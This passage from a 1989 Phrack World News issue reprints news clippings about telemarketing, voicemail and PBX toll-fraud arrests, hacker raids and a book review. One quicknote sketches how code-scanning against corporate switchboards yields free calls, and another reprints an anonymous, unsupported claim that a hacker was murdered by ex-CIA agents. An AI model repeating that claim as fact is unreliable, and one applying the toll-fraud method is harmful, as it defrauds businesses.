  4338. read you a number, 800-PRE-SUFF.
  4339.  
  4340. Call this number and you will be connected with the Ozark
  4341. Airlines reservation office.  Here they will have a database
  4342. which stores all of Ozark's itineraries.  Simply state the date,
  4343. flight number, departure and destination cities, and passenger
  4344. name.  It's that easy!  You can later dial the same access number
  4345. and cancel or modify your itineraries.  The system even includes
  4346. search functions if you don't know the flight number, and an
  4347. extensive help system (just say "How do I make a reservation?").
  4348. _______________________________________________________________________________
  4349.  
  4350. Fighting Back Against Junk Calls                              September 4, 1989
  4351. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "We are not Pavlov's dogs and
  4352. should not have to jump everytime a bell rings."
  4353.  
  4354. And if we do hop to the phone on demand, we ought to be paid for
  4355. it, says Bulmash, president of Private Citizen, Inc., a
  4356. Warrenville, IL organization designed to prevent what Bulmash
  4357. describes as "junk calls" from telemarketers.
  4358.  
  4359. We deserve at least a C-note -- $100, he says.
  4360.  
  4361. Twice a year, Bulmash, age 43, a paralegal by trade, mails a
  4362. directory of people who don't wish to have telephone solicitors
  4363. call them to 600 telemarketing firms.  Along with the
  4364. directories, he sends a contract which states that the people
  4365. listed will listen to the solicitors only in exchange for $100.
  4366.  
  4367. If the solicitors call, the contract says, the telemarketing
  4368. company owes the listener $100.  It's for "use of private
  4369. property -- the phone, your ear, your time," says Bulmash.
  4370.  
  4371. Subscribers, now numbering about 1000, pay $15 per year to be
  4372. listed in the
  4373. Private Citizen directory.
  4374.  
  4375. While Bulmash doesn't guarantee you won't be called, he does
  4376. offer some success stories.  He says subscribers have collected
  4377. anywhere from $5 - $92 from telemarketing companies.  He offers a
  4378. money-back deal for those subscribers not completely satisfied.
  4379. He says only one person has taken him up on it.
  4380.  
  4381. "You can tell those companies 500 times over the phone not to
  4382. call and they won't listen," Bulmash says.  "But when you
  4383. threaten them with charging them for your time, that gets their
  4384. attention."
  4385.  
  4386. Bulmash, who began Private Citizen in May, 1988, says
  4387. telemarketers have the attitude of "we're big business, so you
  4388. just hang up the phone if you don't like us.  I say we have a
  4389. right to be left alone in the first place, at least in our
  4390. homes."  Typically, a telemarketing call to a home has less than
  4391. a 3 percent success rate, he said, with the other 97 percent of
  4392. us -- and we know who we are -- being unnecessarily
  4393. inconvenienced.
  4394.  
  4395. Bulmash says he has testified before Illinois and California
  4396. state legislative committees and has lobbied state and federal
  4397. lawmakers for relief from telemarketers.  He teaches the members
  4398. of his organization how to bill for their time, and in many
  4399. cases, make the charges stick and get payment for "the use of
  4400. their time, ear and phone."
  4401.  
  4402. For more information on Private Citizen, contact Bulmash at
  4403. 312-393-1555.
  4404.  
  4405. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4406.  
  4407. Banned in Boston -- Telemarketer Gets Sued!                  September 14, 1989
  4408. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4409. Alan Schlesinger's stock in trade is suing people.  But you might
  4410. say his stock is too hot to handle at Merrill Lynch these days.
  4411. A Boston lawyer who hates telephone solicitors, Schlesinger sued
  4412. Merrill Lynch after the brokerage firm ignored "repeated
  4413. requests" to quit calling him with investment proposals.
  4414.  
  4415. To Merrill Lynch's surprise, he won an injunction.  Indeed, he
  4416. sued them twice and won both times.  The second time was after an
  4417. unwitting broker called him in violation of the court order
  4418. prohibiting it.
  4419.  
  4420. "This is something that bothers a lot of people, but they don't
  4421. have the sense they can do something about it," said Schlesinger,
  4422. whose best retort is a tort, it would seem.  In the second suit,
  4423. the court awarded him $300, for the costs of his prosecution of
  4424. the matter and for his time spent on the phone with the brokerage
  4425. house's phone room.
  4426.  
  4427. "He is using an atom bomb to deal with a gnat," said William
  4428. Fitzpatrick, chief lawyer for the Securities Industry
  4429. Association, faulting Schlesinger for doing what comes naturally
  4430. for an attorney:  "Being a lawyer myself, I can only guess he
  4431. doesn't have enough brains to just hang up the phone."
  4432. ______________________________________________________________________
  4433.  
  4434.                                 ==Phrack Inc.==
  4435.  
  4436.                     Volume Three, Issue 28, File #12 of 12
  4437.  
  4438.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  4439.             PWN                                                 PWN
  4440.             PWN        P h r a c k   W o r l d   N e w s        PWN
  4441.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  4442.             PWN               Issue XXVIII/Part 4               PWN
  4443.             PWN                                                 PWN
  4444.             PWN                 October 7, 1989                 PWN
  4445.             PWN                                                 PWN
  4446.             PWN          Created, Written, and Edited           PWN
  4447.             PWN               by Knight Lightning               PWN
  4448.             PWN                                                 PWN
  4449.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  4450.  
  4451.  
  4452. Woman Indicted As Computer Hacker Mastermind                      June 21, 1989
  4453. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4454. by John Camper (Chicago Tribune)
  4455.  
  4456. A federal grand jury indicated a Chicago woman Tuesday for
  4457. allegedly masterminding a nationwide ring of computer hackers
  4458. that stole more than $1.6 million of telephone and computer
  4459. service from various companies.
  4460.  
  4461. The indictment charges that Leslie Lynne Doucette, 35, of 6748
  4462. North Ashland Ave, and 152 associates shared hundreds of stolen
  4463. credit card numbers by breaking into corporate "voicemail"
  4464. systems and turning them into computer bulletin boards.
  4465.  
  4466. Voicemail is a computerized telephone answering machine.  After a
  4467. caller dials the machine's number he punches more numbers on his
  4468. telephone to place messages in particular voicemail boxes or
  4469. retrieve messages already there.
  4470.  
  4471. The indictment charges that the hacker ring obtained more than
  4472. $9,531.65 of merchandise and $1,453 in Western Union money orders
  4473. by charging them to stolen bank credit card numbers.
  4474.  
  4475. It says the group used stolen computer passwords to obtain
  4476. $38,200 of voicemail service and stolen telephone credit card
  4477. numbers to run up more than $286,362 of telephone service.
  4478.  
  4479. But the biggest haul, more than $1,291,362, according to the
  4480. indictment, represented telephone service that was stolen through
  4481. the use of Private Branch eXchange (PBX) "extender codes."
  4482.  
  4483. A PBX system provides internal telephone service within a
  4484. company.  If a PBX system is equipped with an extender, a person
  4485. can call the PBX system, punch in a code, and dial long distance
  4486. at the expense of the company that owns the
  4487. system.
  4488.  
  4489. The only corporate victims of the alleged fraud named in the
  4490. indictment are August Financial Corporation of Long Beach
  4491. California, and A-1 Beeper Service of Mobile, Alabama.
  4492.  
  4493. Doucette has been held without bond in the Metropolitan
  4494. Correctional Center since May 24, when she was arrested on a raid
  4495. on her apartment that netted 168 telephone credit card numbers
  4496. and 39 extender codes, federal authorities said.  The indictment
  4497. does not name any members of the alleged ring, but authorities
  4498. said the investigation is continuing.
  4499.  
  4500. United States Attorney Anton R. Valukas said the indictment is
  4501. the nation's first involving abuse of voicemail.
  4502.  
  4503. "The proliferation of computer assisted telecommunications and
  4504. the increasing reliance on this equipment by American and
  4505. international business create a potential for serious harm," he
  4506. said.
  4507.  
  4508. Authorities said they discovered the scheme last December after a
  4509. Rolling Meadows real estate broker reported that hackers had
  4510. invaded his company's voicemail system and changed passwords.
  4511.  
  4512. Authorities said they traced the calls into the Rolling Meadows
  4513. voicemail system to telephones in private homes in Chicago,
  4514. Columbus, Ohio, and suburban Detroit, Atlanta and Boston.
  4515.  
  4516. Checks on those phones led them to voicemail systems in companies
  4517. around the country, they said.
  4518.  
  4519. [For more information see Phrack World News XXVII/Part One and
  4520. the article entitled, "Computer Intrusion Network in Detroit,"
  4521. dated as May 25, 1989 --KL]
  4522. _______________________________________________________________________________
  4523.  
  4524. Phreaks Abuse East St. Louis Phone Card
  4525. September 24, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ East
  4526. St. Louis, IL, a dirt-poor minority suburb of the larger Missouri
  4527. city by the same name was victimized for several months by
  4528. phreaks without realizing it until the phone bills for a one year
  4529. period were audited recently.
  4530.  
  4531. According to a recent story in the Belleville, IL
  4532. (News-Democrat), the city is being billed for phone calls to
  4533. dial-a-porn services and from points as far flung as Florida and
  4534. Texas.
  4535.  
  4536. The monthly phone bill for the city of East St. Louis averages
  4537. $5000, and over the past year it has included calls to nearly
  4538. every state as well as to "900" area adult talk lines.  City
  4539. Treasurer Charlotte Moore said the number of questionable calls
  4540. in each month's phone bill, which is usually two inches thick,
  4541. shows the "need for better policing of phones."
  4542.  
  4543. No kidding!  The (News-Democrat) obtained copies of the phone
  4544. bill for several months under the Freedom of Information Act, and
  4545. set about reviewing the places and people called.  For example,
  4546. from March through May of this year, hundreds of dollars in calls
  4547. were made from places in Texas, Florida and elsewhere, and
  4548. charged to a Calling Card number assigned to the city.
  4549.  
  4550. In one instance, a caller in northern Florida made a 288-minute
  4551. call to Miami that cost East St. Louis $39.27.  The
  4552. (News-Democrat) called the Miami number, and reached a man named
  4553. John, who refused to give his last name, and claimed he "...had
  4554. never even heard of East St. Louis..."
  4555.  
  4556. Calls from one certain number in Houston to places all over the
  4557. United States accounted for more than $1000 in charges over
  4558. several months.  A man who answered the phone at the Houston
  4559. number refused to give his name and refused to discuss the
  4560. matter, or explain how his phone might have been used for the
  4561. fraudulent calls.
  4562.  
  4563. Prior to intervention by the newspaper, the city had done
  4564. nothing.  Apparently they were not even aware of the abuse.  On
  4565. notification, the local telco cancelled all outstanding PINS, and
  4566. issued new ones.  Meanwhile, the city of East St. Louis continues
  4567. to plead poverty.  They are barely able to meet payroll for city
  4568. employees, and have skipped a couple of paydays at that.  The
  4569. city has an extremely poor tax base, and will likely file
  4570. bankruptcy in the near future.
  4571. _______________________________________________________________________________
  4572.  
  4573. The Cuckoo's Egg
  4574. October 1, 1989 ~~~~~~~~~~~~~~~~
  4575.     The Cuckoo's Egg: Tracking a Spy Through the Maze of Computer
  4576.          Espionage by Cliff Stoll, Doubleday, 1989, ISBN
  4577.          0-385-24946-2 ($19.95)
  4578.  
  4579.           Book Review by Louise Bernikow, Cosmopolitan, October
  4580. 1989
  4581.  
  4582. Here is a first -- the true story of a man who notices a
  4583. seventy-five cent discrepancy in a computer's accounting system
  4584. and runs the error down until it leads to a real live spy ring.
  4585. Even if you don't know a byte from a bagel, this book will grip
  4586. you on page one and hold you as ferociously as the best mystery
  4587. stories.
  4588.  
  4589. It is astrophysicist-turned-systems-manager Cliff Stoll's first
  4590. week on the job at a lab in Berkeley, California.  The error
  4591. turns up, and he tries to figure out why, partly as an exercise
  4592. in learning about the computer system he's going to be working
  4593. with.  Almost immediately, he discovers that somebody had been
  4594. breaking into the computer network using a fake password.  That
  4595. discovery leads him to other break-ins in other computers,
  4596. including some in military installations.  He alerts the FBI,
  4597. which, since he has lost neither half a million dollars nor any
  4598. classified information, says, "Go away, kid."
  4599.  
  4600. Stoll presses on, sleeping under his desk at night, monitoring
  4601. the system -- a hound waiting for the fox to come out in the
  4602. open.  There is suspense aplenty, but it's the intensely human,
  4603. often funny voice of the man on the trail that makes this book so
  4604. wonderful.  Stoll's girlfriend, Martha, a law student, seems like
  4605. one smart and delightful cookie, and she puts up with his
  4606. obsession pretty well.  In the end, Stoll becomes a national
  4607. hero.  The play-by-play is nothing short of fascinating.
  4608.  
  4609.                   [I wonder if anyone got those cookies --KL]
  4610. _______________________________________________________________________________
  4611.  
  4612. Hackwatch Spokesman Charged
  4613. October 2, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Taken from Computing
  4614. Australia
  4615.  
  4616. Self-styled computer security expert Paul Dummett, alias Stuart
  4617. Gill, has been charged with making false reports to the Victoria
  4618. Police following an investigation into claims he made in the
  4619. daily media late in 1988 and early this year.  The articles often
  4620. quoted Gill, introducing himself as a spokesman for either
  4621. "Hackwatch" or the "DPG monitoring service".
  4622.  
  4623. Gill claimed hackers in Australia had gained access codes from
  4624. others in the US and lifted $500,000 (US) from the International
  4625. Citibank, United States.  Other claims include credit card
  4626. numbers had been posted on bulletin boards for BBS users' access;
  4627. drugs, including steroids, were being sold using bulletin boards;
  4628. evidence of this had been given to the police by informers; and
  4629. in response, the police had raided several hackers' homes.  The
  4630. police, including the Criminal Investigation Bureau and the Fraud
  4631. Squad's Computer Section, repeatedly denied the claims.
  4632.  
  4633. Gill had disappeared, but returned again on September 22 and was
  4634. charged in the Frankston Magistrates' Court under his real name,
  4635. Paul Dummett.  According to court documents, police investigating
  4636. Dummett's claims allegedly found Citibank's computer network had
  4637. not been illegally accessed on its New York number as Dummett had
  4638. claimed.  When Dummett appeared in court his legal aid counsel
  4639. Serge Sztrajt applied successfully to adjourn the case until
  4640. October 20.  Dummett did not enter a plea.
  4641. _______________________________________________________________________________
  4642.  
  4643.                                 PWN Quicknotes ~~~~~~~~~~~~~~ 1.
  4644.                                 Hire A Hacker? -- "Some very
  4645.                                 notable people in the computer
  4646.     industry started out as hackers tinkering around in a
  4647.     mischievous fashion," Ron Gruner, president of Alliant
  4648.     Computer Systems Corporation told Computerworld why he would
  4649.     probably hire Robert T. Morris Jr., of Cornell and creator of
  4650.     Internet worm.  - - - - - - - - - - - - - - - - - - - - - - -
  4651.     - - - - - - - - - - - - - - - - - 2.  Computer Hackers Rip
  4652.     Off Corporate 800 Lines -- Computer hackers pride themselves
  4653.     on never having to pay for long distance calls.  How do they
  4654.     do it?  Sam Daskam, president of Information Security
  4655.     Association (ISA), explains:  Hackers call corporate numbers
  4656.     until they find one with an automated switchboard.  The
  4657.     fingers do not do the walking.  Automatic caller software is
  4658.     used.  Then they link their computer to try all combinations
  4659.     of three or four-digit numbers until they find one which
  4660.     connects them to the company's outside toll or 800 line.
  4661.     Once they get a dial tone, they can make calls anywhere at
  4662.     the firm's expense.  Taken from the Security Letter 1989.  -
  4663.     - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4664.     - - - - - - - - 3.  900 Service Considered -- There has been
  4665.     talk among some companies about switching from using the 800
  4666.     toll free numbers to 900 numbers since the ease of use of the
  4667.     900 numbers has been shown so vividly.  This would save the
  4668.     corporations a large degree of money.  - - - - - - - - - - -
  4669.     - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 4.
  4670.     Grocery Store "Hackers" Sell Drugs And Women -- The VMB
  4671.     (voice mailbox) system of a wholesale grocer in Los Angeles
  4672.     was commandeered to a small band of "hackers," who used the
  4673.     system to run a prostitution ring and disseminate data about
  4674.     drugs.  Finally, valid VMB users complained that they could
  4675.     not use the service since their passwords were invalidated.
  4676.     An investigation disclosed that the "hackers" overrode
  4677.     security features and acquired 200 VMBs for their own use.  -
  4678.     - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4679.     - - - - - - - - 5.  Phone Phreaks Busted In Upstate New York
  4680.     -- Once again it seems that Syracuse, New York is ripe for
  4681.     the picking for law officials to grab hackers involved
  4682.     computer related crimes.  In August the Federal
  4683.     Communications Commission (FCC) put a local area police
  4684.     sergeant in charge of contacting a list of local computer
  4685.     users that were using a local long distance service that
  4686.     offered national and international calling.
  4687.  
  4688.     It seems that one user of the service contacted the company
  4689.     about a large bill, $10,000, that he received.  The company
  4690.     then put a trap on the code and accumulated a list of
  4691.     unauthorized users to that code.  So far the local
  4692.     authorities, the state police, and the FBI have been brought
  4693.     in on the case.  They have been interviewing those on the
  4694.     list and so far most have cooperated fully with the police
  4695.     (most offenders are underage).  One user called Gunter has
  4696.     even allowed the police to use his computer bbs accounts.
  4697.     The service used by those caught (25 people) where to place
  4698.     long distance calls to France, Dominican Republic, Kenya, and
  4699.     Germany.  The callers also used the service to call locally
  4700.     in Syracuse, as one person said that it cleaned up the line
  4701.     noise.  - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4702.     - - - - - - - - - - - - - 6.  Bulletin Board Scanning Saves
  4703.     Boy (August 24, 1989) --Undercover police in San Jose,
  4704.     California, have been watching bulletin boards for several
  4705.     years, looking for computer users who boast about their
  4706.     criminal exploits.  It was such activity that led them to
  4707.     Virginians Dean Ashley Lambey, 34, and Daniel T. Depew, 28,
  4708.     who have been accused of conspiring to kidnap a young boy to
  4709.     be filmed as they molested him and then killed him.  (Article
  4710.     by Tracie L. Thompson of the San Francisco Chronicle.) - - -
  4711.     - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4712.     - - - - - - 7.  German Hackers Attempt To End Smoking (August
  4713.     29, 1989) -- On Saturday, August 26, 1989, ZDF (the second
  4714.     German television station and one of the 2 nationwide
  4715.     television channels) asked their viewers whether they thought
  4716.     smoking should be banned in public areas.  The viewers could
  4717.     reply by telephone, dialing one telephone number for "yes"
  4718.     and another telephone number for "no."  Within a time frame
  4719.     slot of 14 minutes, 52,942 telephone calls came in, with a
  4720.     ratio of 54:46 in favor of prohibiting smoking.  This means
  4721.     that 29,669 voted in favor of a prohibition, and 25,273
  4722.     opposed it.
  4723.  
  4724.     On Monday, August 28, 1989, a group of South German hackers
  4725.     claimed to have manipulated the quota by dialing the "yes"
  4726.     number with 83 personal computers at a rate of 4 times a
  4727.     minute; virtually all of their calls came through so that
  4728.     about the maximum of 4,648 "yes" votes came from their
  4729.     computers.  These circumstances led to new results in the
  4730.     poll: "Yes" = 25,021 and "No" = 25,273, giving the "no" group
  4731.     a small majority.
  4732.  
  4733.                            Story by Klaus Brunnstein - - - - - -
  4734. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4735. - 8.  Immigration Chief Proposes National Computer Screen (June
  4736. 22,
  4737.     1989) --LA JOLLA, CA, -- The Commissioner of Immigration and
  4738.     Naturalization, Alan C. Nelson, today proposed a nationwide
  4739.     computer system to verify the identities of all job
  4740.     applicants in order to halt the widespread use of fraudulent
  4741.     documents by illegal aliens seeking jobs.
  4742.  
  4743.     Mr. Nelson also suggested standardized identity cards for
  4744.     immigrants so as to get fuller compliance with a 1986 law
  4745.     prohibiting employment of illegal aliens.
  4746.  
  4747.     Creating a national identity card and other ways of checking
  4748.     legal status or identity have been repeatedly suggested in
  4749.     Congress as tools in fighting unlawful immigration, but have
  4750.     also been consistently rejected as potential infringements on
  4751.     civil liberties.
  4752.  
  4753.     The national computerized database on everybody is one bad
  4754.     idea that simply refuses to stay dead, no matter how many
  4755.     times we drive a stake through its heart -- if the INS didn't
  4756.     resurrect it, the drug czar or the FBI would.  "Eternal
  4757.     vigilance..."
  4758.  
  4759.                     Story by Roberto Suro (New York Times) - - -
  4760. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4761. - - - - 9.  West German Computer Hackers Accused Of Spying For
  4762. Soviets
  4763.     (Aug. 17, 1989) -- Associated Press (Frankfurt) -- Three
  4764.     computer hackers, suspected of giving the Soviet Union
  4765.     information from military and industrial computers worldwide,
  4766.     have been indicted on espionage charges, prosecutors said
  4767.     yesterday.  The West German government called the breakup of
  4768.     the spy ring, which gave the KGB secret data from 12
  4769.     countries, including the United States, "a major blow" to the
  4770.     Soviets.  In a four-page statement, Kurt Rebman, the chief
  4771.     federal prosecutor, said it was the first time his office had
  4772.     prosecuted hackers for endangering national security.  Taken
  4773.     from the Boston Globe - - - - - - - - - - - - - - - - - - - -
  4774.     - - - - - - - - - - - - - - - - - - - - 10. Challenge To
  4775.     Phreaks! (August 31, 1989) -- Nippon Telegraph & Telephone
  4776.     Corp. (Tokyo) is offering a $7,000 reward to any person or
  4777.     organization that can invade its FEAL-8 private communication
  4778.     and data system, according to an Associated Press report that
  4779.     NTT America Inc. officials could not confirm.  The reward
  4780.     offer supposedly expires 8/31/91.  No telephone number or
  4781.     other information was included.  Taken from the Wall Street
  4782.     Journal.  - - - - - - - - - - - - - - - - - - - - - - - - - -
  4783.     - - - - - - - - - - - - - - 11. Shadow Stalker Loses Out
  4784.     (August 7, 1989) -- A 17-year-old Michigan boy has been
  4785.     charged with posting stolen long-distance telephone codes on
  4786.     a bulletin board system operated in his home.  Brent G.
  4787.     Patrick, alias "Shadow Stalker" online, was arraigned this
  4788.     week on one count of stealing or retaining a financial
  4789.     transaction device without consent.  Patrick was released on
  4790.     $2,500 bond, pending his hearing.  The youth faces a maximum
  4791.     of four years in prison and a $2,000 fine if convicted.  His
  4792.     bulletin board, Wizard Circle, has been closed.  - - - - - -
  4793.     - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4794.     - - - 12. Philadelphia Hackers Change Speed Limit -- Recently
  4795.     an unknown hacker got into the computer that controlled the
  4796.     speed limit on the Burlington-Bristol Bridge.  He proceeded
  4797.     to change the speed limit from 45 m.p.h. to 75 m.p.h. A lot
  4798.     of people were stopped and ticketed and judges say they will
  4799.     not hear any appeals because, "the public should know better
  4800.     than that no matter what the sign says."  The police claim to
  4801.     have leads, however this is doubtful.  - - - - - - - - - - -
  4802.     - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 13.
  4803.     Two Story Jump To Escape From Secret Service (July 26, 1989)
  4804.     -- Red Rebel, a known hacker in Florida was busted by the
  4805.     United States Secret Service and local authorities.  It seems
  4806.     that in attempt to to escape he actually jumped out a second
  4807.     story window and ran for a while.  The Secret Service
  4808.     confiscated two computers and a load of disks.
  4809.  
  4810.     To make matters worse, similar to Oryan QUEST, Red Rebel is
  4811.     not an American citizen and is likely to be deported.  Red
  4812.     Rebel is charged with resisting arrest, interfering with
  4813.     evidence, and something concerning credit card fraud.
  4814.     Information provided by The Traxster.  - - - - - - - - - - -
  4815.     - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 14.
  4816.     Fraud Alert (September 1989) -- PBX fraud is busting out all
  4817.     over.  Long distance carriers are being overwhelmed by
  4818.     corporate customers demanding refunds for fraud perpetrated
  4819.     on them.  No long distance carrier covers their customer's
  4820.     long-term fraud.  If you got fraud you got to pay.  This is
  4821.     not like stolen credit cards.  This is real serious stuff.
  4822.     Thieves are dialing into 800 INWATS lines and, via auto
  4823.     attendants, hacking their way to overseas.  The big calls go
  4824.     to drug-related countries, especially Colombia, Pakistan,
  4825.     Dominican Republic, and Ecuador.  But no one really knows
  4826.     which countries are drug-related and which aren't.  Taken
  4827.     from Teleconnect Magazine.  - - - - - - - - - - - - - - - - -
  4828.     - - - - - - - - - - - - - - - - - - - - - - - 15. Motorola
  4829.     Introduces Network Encryption System (August 4, 1989) --
  4830.     Motorola Government Equipment Group (GEG) has introduced its
  4831.     Network Encryption System (NES), which features the latest in
  4832.     security services for the protection of Local Area Networks
  4833.     (LANs).  Designed in accordance with Secure Data Network
  4834.     System (SDNS) standards including SDNS electronic key
  4835.     management, the NES is a flexible internet security solution
  4836.     for Type I applications.
  4837.  
  4838.     The NES is unique in COMSEC technology because the protocol
  4839.     software is loaded via diskette.  The NES is installed in the
  4840.     drop cable between the computer and the transceiver, or as a
  4841.     gateway device separating a LAN from a backbone network.  The
  4842.     product supports both DoD and ISO internet standards allowing
  4843.     protection over wide area networks.
  4844.  
  4845.     The initial product accommodates connection to IEEE 802.3 and
  4846.     IEEE 802.4 medias.  Motorola Inc. has a Memorandum of
  4847.     Agreement with the National Security Agency and anticipates
  4848.     product endorsement in the first quarter of next year.  The
  4849.     LAN product represents the first of a family of SDNS products
  4850.     that will provide complete, interoperable system security
  4851.     solutions.  Additional information on the NES can be obtained
  4852.     from Joe Marino at (602) 441-5827.  - - - - - - - - - - - - -
  4853.     - - - - - - - - - - - - - - - - - - - - - - - - - - - 16. The
  4854.     Death of Shadow 2600:  No Accident (July 6, 1989) -- The
  4855.     following is a message taken from The Central Office:
  4856.  
  4857.                      89Jul06 from fdg @ The Central Office
  4858.  
  4859.     MY CONDOLENCES TO DAVE FLORY'S FAMILY AND FRIENDS.  Do you
  4860.     all realize WHY a 22 year old died?  It says one thing to me.
  4861.     He was killed by some insane ex-CIA types.  Most likely under
  4862.     orders from the idiots who tried to prosecute him in 1985.
  4863.     This kind of thing is getting more common under President
  4864.     Bush.  He ran the CIA, and he is now encouraging the same
  4865.     dirty tricks to silence people who cause "problems."  Abbie
  4866.     Hoffman was done in the same way.  A small hypodermic full of
  4867.     prussic aced.  You will hear about more ex-hippies, yippies,
  4868.     and hackers/phreaks dying mysteriously in the foreseeable
  4869.     future.
  4870.  
  4871.     You have been warned.  And who am I to know all this?
  4872.     Believe me, friends, I am highly placed in the government.
  4873.     You will see more friends die.  You may laugh now, but I
  4874.     decided to leave a public message in hopes of saving a few
  4875.     lives.
  4876.                            Special Thanks to Epsilon
  4877. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4878. 17. Legion Of Doom Members Raided In Atlanta (July 21, 1989) --
  4879.     The Leftist, The Urvile, and The Prophet, all of the world
  4880.     famous hacking group known as the Legion of Doom, were raided
  4881.     on July 21, 1989.  The day in question is interesting because
  4882.     two years prior, that was the same day that a nationwide
  4883.     sweep netted over 80 hackers across the country including
  4884.     famous names such as Oryan QUEST, Solid State, and Bill From
  4885.     RNOC.
  4886.  
  4887.     The charges against the LOD members range from toll fraud to
  4888.     illegal entry into government computer systems, although as
  4889.     it is told, the government systems were entered by the Urvile
  4890.     and the other two had nothing to do with it.  Currently, all
  4891.     three LOD-Atlanta members are still waiting to find out what
  4892.     will happen to them as charges have not yet been brought
  4893.     against them, very similar to what happened to the hackers in
  4894.     1987.
  4895.  
  4896.     It has been said by security personnel at Michigan Bell that
  4897.     these LOD busts were a spinoff of the supposed arrest of Fry
  4898.     Guy on July 19 for his role in the Delray Beach, Florida
  4899.     probation officer scam (detailed last issue).  It is believe
  4900.     that he had been working closely with LOD-Atlanta (especially
  4901.     The Leftist) and when caught for the probation office scam,
  4902.     he got scared and turned over what he knew about LOD.
  4903. _____________________________________________________________________
  4904.  
  4905.  
  4906. </pre>
  4907. </body>